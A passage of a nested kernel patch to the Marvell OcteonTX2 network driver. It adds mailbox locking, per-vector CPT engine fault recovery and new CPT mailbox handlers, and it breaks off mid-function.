+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+index dfd23580e3b8e..d39d86e694ccf 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+@@ -121,13 +121,17 @@ int mcs_add_intr_wq_entry(struct mcs *mcs, struct mcs_intr_event *event)
+ static int mcs_notify_pfvf(struct mcs_intr_event *event, struct rvu *rvu)
+ {
+ 	struct mcs_intr_info *req;
+-	int err, pf;
++	int pf;
+ 
+ 	pf = rvu_get_pf(event->pcifunc);
+ 
++	mutex_lock(&rvu->mbox_lock);
++
+ 	req = otx2_mbox_alloc_msg_mcs_intr_notify(rvu, pf);
+-	if (!req)
++	if (!req) {
++		mutex_unlock(&rvu->mbox_lock);
+ 		return -ENOMEM;
++	}
+ 
+ 	req->mcs_id = event->mcs_id;
+ 	req->intr_mask = event->intr_mask;
+@@ -135,10 +139,11 @@ static int mcs_notify_pfvf(struct mcs_intr_event *event, struct rvu *rvu)
+ 	req->hdr.pcifunc = event->pcifunc;
+ 	req->lmac_id = event->lmac_id;
+ 
+-	otx2_mbox_msg_send(&rvu->afpf_wq_info.mbox_up, pf);
+-	err = otx2_mbox_wait_for_rsp(&rvu->afpf_wq_info.mbox_up, pf);
+-	if (err)
+-		dev_warn(rvu->dev, "MCS notification to pf %d failed\n", pf);
++	otx2_mbox_wait_for_zero(&rvu->afpf_wq_info.mbox_up, pf);
++
++	otx2_mbox_msg_send_up(&rvu->afpf_wq_info.mbox_up, pf);
++
++	mutex_unlock(&rvu->mbox_lock);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index d88d86bf07b03..a7034b47ed6c9 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -1164,8 +1164,16 @@ static int rvu_setup_hw_resources(struct rvu *rvu)
+ 		goto nix_err;
+ 	}
+ 
++	err = rvu_cpt_init(rvu);
++	if (err) {
++		dev_err(rvu->dev, "%s: Failed to initialize cpt\n", __func__);
++		goto mcs_err;
++	}
++
+ 	return 0;
+ 
++mcs_err:
++	rvu_mcs_exit(rvu);
+ nix_err:
+ 	rvu_nix_freemem(rvu);
+ npa_err:
+@@ -2106,7 +2114,7 @@ MBOX_MESSAGES
+ 	}
+ }
+ 
+-static void __rvu_mbox_handler(struct rvu_work *mwork, int type)
++static void __rvu_mbox_handler(struct rvu_work *mwork, int type, bool poll)
+ {
+ 	struct rvu *rvu = mwork->rvu;
+ 	int offset, err, id, devid;
+@@ -2173,6 +2181,9 @@ static void __rvu_mbox_handler(struct rvu_work *mwork, int type)
+ 	}
+ 	mw->mbox_wrk[devid].num_msgs = 0;
+ 
++	if (poll)
++		otx2_mbox_wait_for_zero(mbox, devid);
++
+ 	/* Send mbox responses to VF/PF */
+ 	otx2_mbox_msg_send(mbox, devid);
+ }
+@@ -2180,15 +2191,18 @@ static void __rvu_mbox_handler(struct rvu_work *mwork, int type)
+ static inline void rvu_afpf_mbox_handler(struct work_struct *work)
+ {
+ 	struct rvu_work *mwork = container_of(work, struct rvu_work, work);
++	struct rvu *rvu = mwork->rvu;
+ 
+-	__rvu_mbox_handler(mwork, TYPE_AFPF);
++	mutex_lock(&rvu->mbox_lock);
++	__rvu_mbox_handler(mwork, TYPE_AFPF, true);
++	mutex_unlock(&rvu->mbox_lock);
+ }
+ 
+ static inline void rvu_afvf_mbox_handler(struct work_struct *work)
+ {
+ 	struct rvu_work *mwork = container_of(work, struct rvu_work, work);
+ 
+-	__rvu_mbox_handler(mwork, TYPE_AFVF);
++	__rvu_mbox_handler(mwork, TYPE_AFVF, false);
+ }
+ 
+ static void __rvu_mbox_up_handler(struct rvu_work *mwork, int type)
+@@ -2363,6 +2377,8 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		}
+ 	}
+ 
++	mutex_init(&rvu->mbox_lock);
++
+ 	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
+ 	if (!mbox_regions) {
+ 		err = -ENOMEM;
+@@ -2512,10 +2528,9 @@ static void rvu_queue_work(struct mbox_wq_info *mw, int first,
+ 	}
+ }
+ 
+-static irqreturn_t rvu_mbox_intr_handler(int irq, void *rvu_irq)
++static irqreturn_t rvu_mbox_pf_intr_handler(int irq, void *rvu_irq)
+ {
+ 	struct rvu *rvu = (struct rvu *)rvu_irq;
+-	int vfs = rvu->vfs;
+ 	u64 intr;
+ 
+ 	intr = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_PFAF_MBOX_INT);
+@@ -2529,6 +2544,18 @@ static irqreturn_t rvu_mbox_intr_handler(int irq, void *rvu_irq)
+ 
+ 	rvu_queue_work(&rvu->afpf_wq_info, 0, rvu->hw->total_pfs, intr);
+ 
++	return IRQ_HANDLED;
++}
++
++static irqreturn_t rvu_mbox_intr_handler(int irq, void *rvu_irq)
++{
++	struct rvu *rvu = (struct rvu *)rvu_irq;
++	int vfs = rvu->vfs;
++	u64 intr;
++
++	/* Sync with mbox memory region */
++	rmb();
++
+ 	/* Handle VF interrupts */
+ 	if (vfs > 64) {
+ 		intr = rvupf_read64(rvu, RVU_PF_VFPF_MBOX_INTX(1));
+@@ -2865,7 +2892,7 @@ static int rvu_register_interrupts(struct rvu *rvu)
+ 	/* Register mailbox interrupt handler */
+ 	sprintf(&rvu->irq_name[RVU_AF_INT_VEC_MBOX * NAME_SIZE], "RVUAF Mbox");
+ 	ret = request_irq(pci_irq_vector(rvu->pdev, RVU_AF_INT_VEC_MBOX),
+-			  rvu_mbox_intr_handler, 0,
++			  rvu_mbox_pf_intr_handler, 0,
+ 			  &rvu->irq_name[RVU_AF_INT_VEC_MBOX * NAME_SIZE], rvu);
+ 	if (ret) {
+ 		dev_err(rvu->dev,
+@@ -3039,9 +3066,8 @@ static int rvu_flr_init(struct rvu *rvu)
+ 			    cfg | BIT_ULL(22));
+ 	}
+ 
+-	rvu->flr_wq = alloc_workqueue("rvu_afpf_flr",
+-				      WQ_UNBOUND | WQ_HIGHPRI | WQ_MEM_RECLAIM,
+-				       1);
++	rvu->flr_wq = alloc_ordered_workqueue("rvu_afpf_flr",
++					      WQ_HIGHPRI | WQ_MEM_RECLAIM);
+ 	if (!rvu->flr_wq)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index 0b76dfa979d4e..a3ae21398ca74 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -109,6 +109,8 @@ struct rvu_block {
+ 	u64  lfreset_reg;
+ 	unsigned char name[NAME_SIZE];
+ 	struct rvu *rvu;
++	u64 cpt_flt_eng_map[3];
++	u64 cpt_rcvrd_eng_map[3];
+ };
+ 
+ struct nix_mcast {
+@@ -506,6 +508,7 @@ struct rvu {
+ 	struct ptp		*ptp;
+ 
+ 	int			mcs_blk_cnt;
++	int			cpt_pf_num;
+ 
+ #ifdef CONFIG_DEBUG_FS
+ 	struct rvu_debugfs	rvu_dbg;
+@@ -520,6 +523,10 @@ struct rvu {
+ 	struct list_head	mcs_intrq_head;
+ 	/* mcs interrupt queue lock */
+ 	spinlock_t		mcs_intrq_lock;
++	/* CPT interrupt lock */
++	spinlock_t		cpt_intr_lock;
++
++	struct mutex		mbox_lock; /* Serialize mbox up and down msgs */
+ };
+ 
+ static inline void rvu_write64(struct rvu *rvu, u64 block, u64 offset, u64 val)
+@@ -872,6 +879,7 @@ void rvu_cpt_unregister_interrupts(struct rvu *rvu);
+ int rvu_cpt_lf_teardown(struct rvu *rvu, u16 pcifunc, int blkaddr, int lf,
+ 			int slot);
+ int rvu_cpt_ctx_flush(struct rvu *rvu, u16 pcifunc);
++int rvu_cpt_init(struct rvu *rvu);
+ 
+ #define NDC_AF_BANK_MASK       GENMASK_ULL(7, 0)
+ #define NDC_AF_BANK_LINE_MASK  GENMASK_ULL(31, 16)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index bcb4385d0621c..d1e6b12ecfa70 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -232,7 +232,7 @@ static void cgx_notify_pfs(struct cgx_link_event *event, struct rvu *rvu)
+ 	struct cgx_link_user_info *linfo;
+ 	struct cgx_link_info_msg *msg;
+ 	unsigned long pfmap;
+-	int err, pfid;
++	int pfid;
+ 
+ 	linfo = &event->link_uinfo;
+ 	pfmap = cgxlmac_to_pfmap(rvu, event->cgx_id, event->lmac_id);
+@@ -250,16 +250,22 @@ static void cgx_notify_pfs(struct cgx_link_event *event, struct rvu *rvu)
+ 			continue;
+ 		}
+ 
++		mutex_lock(&rvu->mbox_lock);
++
+ 		/* Send mbox message to PF */
+ 		msg = otx2_mbox_alloc_msg_cgx_link_event(rvu, pfid);
+-		if (!msg)
++		if (!msg) {
++			mutex_unlock(&rvu->mbox_lock);
+ 			continue;
++		}
++
+ 		msg->link_info = *linfo;
+-		otx2_mbox_msg_send(&rvu->afpf_wq_info.mbox_up, pfid);
+-		err = otx2_mbox_wait_for_rsp(&rvu->afpf_wq_info.mbox_up, pfid);
+-		if (err)
+-			dev_warn(rvu->dev, "notification to pf %d failed\n",
+-				 pfid);
++
++		otx2_mbox_wait_for_zero(&rvu->afpf_wq_info.mbox_up, pfid);
++
++		otx2_mbox_msg_send_up(&rvu->afpf_wq_info.mbox_up, pfid);
++
++		mutex_unlock(&rvu->mbox_lock);
+ 	} while (pfmap);
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+index 38bbae5d9ae05..6fb02b93c1718 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+@@ -37,34 +37,68 @@
+ 	(_rsp)->free_sts_##etype = free_sts;                        \
+ })
+ 
+-static irqreturn_t rvu_cpt_af_flt_intr_handler(int irq, void *ptr)
++static irqreturn_t cpt_af_flt_intr_handler(int vec, void *ptr)
+ {
+ 	struct rvu_block *block = ptr;
+ 	struct rvu *rvu = block->rvu;
+ 	int blkaddr = block->addr;
+-	u64 reg0, reg1, reg2;
+-
+-	reg0 = rvu_read64(rvu, blkaddr, CPT_AF_FLTX_INT(0));
+-	reg1 = rvu_read64(rvu, blkaddr, CPT_AF_FLTX_INT(1));
+-	if (!is_rvu_otx2(rvu)) {
+-		reg2 = rvu_read64(rvu, blkaddr, CPT_AF_FLTX_INT(2));
+-		dev_err_ratelimited(rvu->dev,
+-				    "Received CPTAF FLT irq : 0x%llx, 0x%llx, 0x%llx",
+-				     reg0, reg1, reg2);
+-	} else {
+-		dev_err_ratelimited(rvu->dev,
+-				    "Received CPTAF FLT irq : 0x%llx, 0x%llx",
+-				     reg0, reg1);
++	u64 reg, val;
++	int i, eng;
++	u8 grp;
++
++	reg = rvu_read64(rvu, blkaddr, CPT_AF_FLTX_INT(vec));
++	dev_err_ratelimited(rvu->dev, "Received CPTAF FLT%d irq : 0x%llx", vec, reg);
++
++	i = -1;
++	while ((i = find_next_bit((unsigned long *)&reg, 64, i + 1)) < 64) {
++		switch (vec) {
++		case 0:
++			eng = i;
++			break;
++		case 1:
++			eng = i + 64;
++			break;
++		case 2:
++			eng = i + 128;
++			break;
++		}
++		grp = rvu_read64(rvu, blkaddr, CPT_AF_EXEX_CTL2(eng)) & 0xFF;
++		/* Disable and enable the engine which triggers fault */
++		rvu_write64(rvu, blkaddr, CPT_AF_EXEX_CTL2(eng), 0x0);
++		val = rvu_read64(rvu, blkaddr, CPT_AF_EXEX_CTL(eng));
++		rvu_write64(rvu, blkaddr, CPT_AF_EXEX_CTL(eng), val & ~1ULL);
++
++		rvu_write64(rvu, blkaddr, CPT_AF_EXEX_CTL2(eng), grp);
++		rvu_write64(rvu, blkaddr, CPT_AF_EXEX_CTL(eng), val | 1ULL);
++
++		spin_lock(&rvu->cpt_intr_lock);
++		block->cpt_flt_eng_map[vec] |= BIT_ULL(i);
++		val = rvu_read64(rvu, blkaddr, CPT_AF_EXEX_STS(eng));
++		val = val & 0x3;
++		if (val == 0x1 || val == 0x2)
++			block->cpt_rcvrd_eng_map[vec] |= BIT_ULL(i);
++		spin_unlock(&rvu->cpt_intr_lock);
+ 	}
+-
+-	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT(0), reg0);
+-	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT(1), reg1);
+-	if (!is_rvu_otx2(rvu))
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT(2), reg2);
++	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT(vec), reg);
+ 
+ 	return IRQ_HANDLED;
+ }
+ 
++static irqreturn_t rvu_cpt_af_flt0_intr_handler(int irq, void *ptr)
++{
++	return cpt_af_flt_intr_handler(CPT_AF_INT_VEC_FLT0, ptr);
++}
++
++static irqreturn_t rvu_cpt_af_flt1_intr_handler(int irq, void *ptr)
++{
++	return cpt_af_flt_intr_handler(CPT_AF_INT_VEC_FLT1, ptr);
++}
++
++static irqreturn_t rvu_cpt_af_flt2_intr_handler(int irq, void *ptr)
++{
++	return cpt_af_flt_intr_handler(CPT_10K_AF_INT_VEC_FLT2, ptr);
++}
++
+ static irqreturn_t rvu_cpt_af_rvu_intr_handler(int irq, void *ptr)
+ {
+ 	struct rvu_block *block = ptr;
+@@ -119,8 +153,10 @@ static void cpt_10k_unregister_interrupts(struct rvu_block *block, int off)
+ 	int i;
+ 
+ 	/* Disable all CPT AF interrupts */
+-	for (i = 0; i < CPT_10K_AF_INT_VEC_RVU; i++)
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(i), 0x1);
++	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(0), ~0ULL);
++	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(1), ~0ULL);
++	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(2), 0xFFFF);
++
+ 	rvu_write64(rvu, blkaddr, CPT_AF_RVU_INT_ENA_W1C, 0x1);
+ 	rvu_write64(rvu, blkaddr, CPT_AF_RAS_INT_ENA_W1C, 0x1);
+ 
+@@ -151,7 +187,7 @@ static void cpt_unregister_interrupts(struct rvu *rvu, int blkaddr)
+ 
+ 	/* Disable all CPT AF interrupts */
+ 	for (i = 0; i < CPT_AF_INT_VEC_RVU; i++)
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(i), 0x1);
++		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(i), ~0ULL);
+ 	rvu_write64(rvu, blkaddr, CPT_AF_RVU_INT_ENA_W1C, 0x1);
+ 	rvu_write64(rvu, blkaddr, CPT_AF_RAS_INT_ENA_W1C, 0x1);
+ 
+@@ -172,16 +208,31 @@ static int cpt_10k_register_interrupts(struct rvu_block *block, int off)
+ {
+ 	struct rvu *rvu = block->rvu;
+ 	int blkaddr = block->addr;
++	irq_handler_t flt_fn;
+ 	int i, ret;
+ 
+ 	for (i = CPT_10K_AF_INT_VEC_FLT0; i < CPT_10K_AF_INT_VEC_RVU; i++) {
+ 		sprintf(&rvu->irq_name[(off + i) * NAME_SIZE], "CPTAF FLT%d", i);
++
++		switch (i) {
++		case CPT_10K_AF_INT_VEC_FLT0:
++			flt_fn = rvu_cpt_af_flt0_intr_handler;
++			break;
++		case CPT_10K_AF_INT_VEC_FLT1:
++			flt_fn = rvu_cpt_af_flt1_intr_handler;
++			break;
++		case CPT_10K_AF_INT_VEC_FLT2:
++			flt_fn = rvu_cpt_af_flt2_intr_handler;
++			break;
++		}
+ 		ret = rvu_cpt_do_register_interrupt(block, off + i,
+-						    rvu_cpt_af_flt_intr_handler,
+-						    &rvu->irq_name[(off + i) * NAME_SIZE]);
++						    flt_fn, &rvu->irq_name[(off + i) * NAME_SIZE]);
+ 		if (ret)
+ 			goto err;
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), 0x1);
++		if (i == CPT_10K_AF_INT_VEC_FLT2)
++			rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), 0xFFFF);
++		else
++			rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), ~0ULL);
+ 	}
+ 
+ 	ret = rvu_cpt_do_register_interrupt(block, off + CPT_10K_AF_INT_VEC_RVU,
+@@ -208,8 +259,8 @@ static int cpt_register_interrupts(struct rvu *rvu, int blkaddr)
+ {
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	struct rvu_block *block;
++	irq_handler_t flt_fn;
+ 	int i, offs, ret = 0;
+-	char irq_name[16];
+ 
+ 	if (!is_block_implemented(rvu->hw, blkaddr))
+ 		return 0;
+@@ -226,13 +277,20 @@ static int cpt_register_interrupts(struct rvu *rvu, int blkaddr)
+ 		return cpt_10k_register_interrupts(block, offs);
+ 
+ 	for (i = CPT_AF_INT_VEC_FLT0; i < CPT_AF_INT_VEC_RVU; i++) {
+-		snprintf(irq_name, sizeof(irq_name), "CPTAF FLT%d", i);
++		sprintf(&rvu->irq_name[(offs + i) * NAME_SIZE], "CPTAF FLT%d", i);
++		switch (i) {
++		case CPT_AF_INT_VEC_FLT0:
++			flt_fn = rvu_cpt_af_flt0_intr_handler;
++			break;
++		case CPT_AF_INT_VEC_FLT1:
++			flt_fn = rvu_cpt_af_flt1_intr_handler;
++			break;
++		}
+ 		ret = rvu_cpt_do_register_interrupt(block, offs + i,
+-						    rvu_cpt_af_flt_intr_handler,
+-						    irq_name);
++						    flt_fn, &rvu->irq_name[(offs + i) * NAME_SIZE]);
+ 		if (ret)
+ 			goto err;
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), 0x1);
++		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), ~0ULL);
+ 	}
+ 
+ 	ret = rvu_cpt_do_register_interrupt(block, offs + CPT_AF_INT_VEC_RVU,
+@@ -290,7 +348,7 @@ static int get_cpt_pf_num(struct rvu *rvu)
+ 
+ static bool is_cpt_pf(struct rvu *rvu, u16 pcifunc)
+ {
+-	int cpt_pf_num = get_cpt_pf_num(rvu);
++	int cpt_pf_num = rvu->cpt_pf_num;
+ 
+ 	if (rvu_get_pf(pcifunc) != cpt_pf_num)
+ 		return false;
+@@ -302,7 +360,7 @@ static bool is_cpt_pf(struct rvu *rvu, u16 pcifunc)
+ 
+ static bool is_cpt_vf(struct rvu *rvu, u16 pcifunc)
+ {
+-	int cpt_pf_num = get_cpt_pf_num(rvu);
++	int cpt_pf_num = rvu->cpt_pf_num;
+ 
+ 	if (rvu_get_pf(pcifunc) != cpt_pf_num)
+ 		return false;
+@@ -801,6 +859,64 @@ int rvu_mbox_handler_cpt_ctx_cache_sync(struct rvu *rvu, struct msg_req *req,
+ 	return rvu_cpt_ctx_flush(rvu, req->hdr.pcifunc);
+ }
+ 
++int rvu_mbox_handler_cpt_lf_reset(struct rvu *rvu, struct cpt_lf_rst_req *req,
++				  struct msg_rsp *rsp)
++{
++	u16 pcifunc = req->hdr.pcifunc;
++	struct rvu_block *block;
++	int cptlf, blkaddr, ret;
++	u16 actual_slot;
++	u64 ctl, ctl2;
++
++	blkaddr = rvu_get_blkaddr_from_slot(rvu, BLKTYPE_CPT, pcifunc,
++					    req->slot, &actual_slot);
++	if (blkaddr < 0)
++		return CPT_AF_ERR_LF_INVALID;
++
++	block = &rvu->hw->block[blkaddr];
++
++	cptlf = rvu_get_lf(rvu, block, pcifunc, actual_slot);
++	if (cptlf < 0)
++		return CPT_AF_ERR_LF_INVALID;
++	ctl = rvu_read64(rvu, blkaddr, CPT_AF_LFX_CTL(cptlf));
++	ctl2 = rvu_read64(rvu, blkaddr, CPT_AF_LFX_CTL2(cptlf));
++
++	ret = rvu_lf_reset(rvu, block, cptlf);
++	if (ret)
++		dev_err(rvu->dev, "Failed to reset blkaddr %d LF%d\n",
++			block->addr, cptlf);
++
++	rvu_write64(rvu, blkaddr, CPT_AF_LFX_CTL(cptlf), ctl);
++	rvu_write64(rvu, blkaddr, CPT_AF_LFX_CTL2(cptlf), ctl2);
++
++	return 0;
++}
++
++int rvu_mbox_handler_cpt_flt_eng_info(struct rvu *rvu, struct cpt_flt_eng_info_req *req,
++				      struct cpt_flt_eng_info_rsp *rsp)
++{
++	struct rvu_block *block;
++	unsigned long flags;
++	int blkaddr, vec;
++
++	blkaddr = validate_and_get_cpt_blkaddr(req->blkaddr);
++	if (blkaddr < 0)
++		return blkaddr;
++
++	block = &rvu->hw->block[blkaddr];
++	for (vec = 0; vec < CPT_10K_AF_INT_VEC_RVU; vec++) {
++		spin_lock_irqsave(&rvu->cpt_intr_lock, flags);
++		rsp->flt_eng_map[vec] = block->cpt_flt_eng_map[vec];
++		rsp->rcvrd_eng_map[vec] = block->cpt_rcvrd_eng_map[vec];
++		if (req->reset) {
++			block->cpt_flt_eng_map[vec] = 0x0;
++			block->cpt_rcvrd_eng_map[vec] = 0x0;
++		}
++		spin_unlock_irqrestore(&rvu->cpt_intr_lock, flags);
++	}
++	return 0;
++}
++
+ static void cpt_rxc_teardown(struct rvu *rvu, int blkaddr)
+ {
+ 	struct cpt_rxc_time_cfg_req req;
+@@ -940,7 +1056,7 @@ int rvu_cpt_lf_teardown(struct rvu *rvu, u16 pcifunc, int blkaddr, int lf, int s
+ static int cpt_inline_inb_lf_cmd_send(struct rvu *rvu, int blkaddr,
+ 				      int nix_blkaddr)
+ {
+-	int cpt_pf_num = get_cpt_pf_num(rvu);
++	int cpt_pf_num = rvu->cpt_pf_num;
+ 	struct cpt_inst_lmtst_req *req;
+ 	dma_addr_t res_daddr;
+ 	int timeout = 3000;
+@@ -1084,3 +1200,12 @@ int rvu_cpt_ctx_flush(struct rvu *rvu, u16 pcifunc)
+ 
+ 	return 0;
+ }
++
++int rvu_cpt_init(struct rvu *rvu)
++{
++	/* Retrieve CPT PF number */
++	rvu->cpt_pf_num = get_cpt_pf_num(rvu);
++	spin_lock_init(&rvu->cpt_intr_lock);
++
++	return 0;
++}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 44950c2542bb7..c15d1864a6371 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -785,7 +785,7 @@ static inline int otx2_sync_mbox_up_msg(struct mbox *mbox, int devid)
+ 
+ 	if (!otx2_mbox_nonempty(&mbox->mbox_up, devid))
+ 		return 0;
+-	otx2_mbox_msg_send(&mbox->mbox_up, devid);
++	otx2_mbox_msg_send_up(&mbox->mbox_up, devid);
+ 	err = otx2_mbox_wait_for_rsp(&mbox->mbox_up, devid);
+ 	if (err)
+ 		return err;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index a2d8ac6204054..7e2c30927c312 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -272,8 +272,7 @@ static int otx2_pf_flr_init(struct otx2_nic *pf, int num_vfs)
+ {
+ 	int vf;
+ 
+-	pf->flr_wq = alloc_workqueue("otx2_pf_flr_wq",
+-				     WQ_UNBOUND | WQ_HIGHPRI, 1);
++	pf->flr_wq = alloc_ordered_workqueue("otx2_pf_flr_wq", WQ_HIGHPRI);
+ 	if (!pf->flr_wq)
+ 		return -ENOMEM;
+ 
+@@ -292,8 +291,8 @@ static int otx2_pf_flr_init(struct otx2_nic *pf, int num_vfs)
+ 	return 0;
+ }
+ 
+-static void otx2_queue_work(struct mbox *mw, struct workqueue_struct *mbox_wq,
+-			    int first, int mdevs, u64 intr, int type)
++static void otx2_queue_vf_work(struct mbox *mw, struct workqueue_struct *mbox_wq,
++			       int first, int mdevs, u64 intr)
+ {
+ 	struct otx2_mbox_dev *mdev;
+ 	struct otx2_mbox *mbox;
+@@ -307,40 +306,26 @@ static void otx2_queue_work(struct mbox *mw, struct workqueue_struct *mbox_wq,
+ 
+ 		mbox = &mw->mbox;
+ 		mdev = &mbox->dev[i];
+-		if (type == TYPE_PFAF)
+-			otx2_sync_mbox_bbuf(mbox, i);
+ 		hdr = mdev->mbase + mbox->rx_start;
+ 		/* The hdr->num_msgs is set to zero immediately in the interrupt
+-		 * handler to  ensure that it holds a correct value next time
+-		 * when the interrupt handler is called.
+-		 * pf->mbox.num_msgs holds the data for use in pfaf_mbox_handler
+-		 * pf>mbox.up_num_msgs holds the data for use in
+-		 * pfaf_mbox_up_handler.
++		 * handler to ensure that it holds a correct value next time
++		 * when the interrupt handler is called. pf->mw[i].num_msgs
++		 * holds the data for use in otx2_pfvf_mbox_handler and
++		 * pf->mw[i].up_num_msgs holds the data for use in
++		 * otx2_pfvf_mbox_up_handler.
+ 		 */
+ 		if (hdr->num_msgs) {
+ 			mw[i].num_msgs = hdr->num_msgs;
+ 			hdr->num_msgs = 0;
+-			if (type == TYPE_PFAF)
+-				memset(mbox->hwbase + mbox->rx_start, 0,
+-				       ALIGN(sizeof(struct mbox_hdr),
+-					     sizeof(u64)));
+-
+ 			queue_work(mbox_wq, &mw[i].mbox_wrk);
+ 		}
+ 
+ 		mbox = &mw->mbox_up;
+ 		mdev = &mbox->dev[i];
+-		if (type == TYPE_PFAF)
+-			otx2_sync_mbox_bbuf(mbox, i);
+ 		hdr = mdev->mbase + mbox->rx_start;
+ 		if (hdr->num_msgs) {
+ 			mw[i].up_num_msgs = hdr->num_msgs;
+ 			hdr->num_msgs = 0;
+-			if (type == TYPE_PFAF)
+-				memset(mbox->hwbase + mbox->rx_start, 0,
+-				       ALIGN(sizeof(struct mbox_hdr),
+-					     sizeof(u64)));
+-
+ 			queue_work(mbox_wq, &mw[i].mbox_up_wrk);
+ 		}
+ 	}
+@@ -356,8 +341,10 @@ static void otx2_forward_msg_pfvf(struct otx2_mbox_dev *mdev,
+ 	/* Msgs are already copied, trigger VF's mbox irq */
+ 	smp_wmb();
+ 
++	otx2_mbox_wait_for_zero(pfvf_mbox, devid);
++
+ 	offset = pfvf_mbox->trigger | (devid << pfvf_mbox->tr_shift);
+-	writeq(1, (void __iomem *)pfvf_mbox->reg_base + offset);
++	writeq(MBOX_DOWN_MSG, (void __iomem *)pfvf_mbox->reg_base + offset);
+ 
+ 	/* Restore VF's mbox bounce buffer region address */
+ 	src_mdev->mbase = bbuf_base;
+@@ -547,7 +534,7 @@ static void otx2_pfvf_mbox_up_handler(struct work_struct *work)
+ end:
+ 		offset = mbox->rx_start + msg->next_msgoff;
+ 		if (mdev->msgs_acked == (vf_mbox->up_num_msgs - 1))
+-			__otx2_mbox_reset(mbox, 0);
++			__otx2_mbox_reset(mbox, vf_idx);
+ 		mdev->msgs_acked++;
+ 	}
+ }
+@@ -564,8 +551,7 @@ static irqreturn_t otx2_pfvf_mbox_intr_handler(int irq, void *pf_irq)
+ 	if (vfs > 64) {
+ 		intr = otx2_read64(pf, RVU_PF_VFPF_MBOX_INTX(1));
+ 		otx2_write64(pf, RVU_PF_VFPF_MBOX_INTX(1), intr);
+-		otx2_queue_work(mbox, pf->mbox_pfvf_wq, 64, vfs, intr,
+-				TYPE_PFVF);
++		otx2_queue_vf_work(mbox, pf->mbox_pfvf_wq, 64, vfs, intr);
+ 		if (intr)
+ 			trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
+ 		vfs = 64;
+@@ -574,7 +560,7 @@ static irqreturn_t otx2_pfvf_mbox_intr_handler(int irq, void *pf_irq)
+ 	intr = otx2_read64(pf, RVU_PF_VFPF_MBOX_INTX(0));
+ 	otx2_write64(pf, RVU_PF_VFPF_MBOX_INTX(0), intr);
+ 
+-	otx2_queue_work(mbox, pf->mbox_pfvf_wq, 0, vfs, intr, TYPE_PFVF);
++	otx2_queue_vf_work(mbox, pf->mbox_pfvf_wq, 0, vfs, intr);
+ 
+ 	if (intr)
+ 		trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
+@@ -599,7 +585,7 @@ static int otx2_pfvf_mbox_init(struct otx2_nic *pf, int numvfs)
+ 
+ 	pf->mbox_pfvf_wq = alloc_workqueue("otx2_pfvf_mailbox",
+ 					   WQ_UNBOUND | WQ_HIGHPRI |
+-					   WQ_MEM_RECLAIM, 1);
++					   WQ_MEM_RECLAIM, 0);
+ 	if (!pf->mbox_pfvf_wq)
+ 		return -ENOMEM;
+ 
+@@ -822,20 +808,22 @@ static void otx2_pfaf_mbox_handler(struct work_struct *work)
+ 	struct mbox *af_mbox;
+ 	struct otx2_nic *pf;
+ 	int offset, id;
++	u16 num_msgs;
+ 
+ 	af_mbox = container_of(work, struct mbox, mbox_wrk);
+ 	mbox = &af_mbox->mbox;
+ 	mdev = &mbox->dev[0];
